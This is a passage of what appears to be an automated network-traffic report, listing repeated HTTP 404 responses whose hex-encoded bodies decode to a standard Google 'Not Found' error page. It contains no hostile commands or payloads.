7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 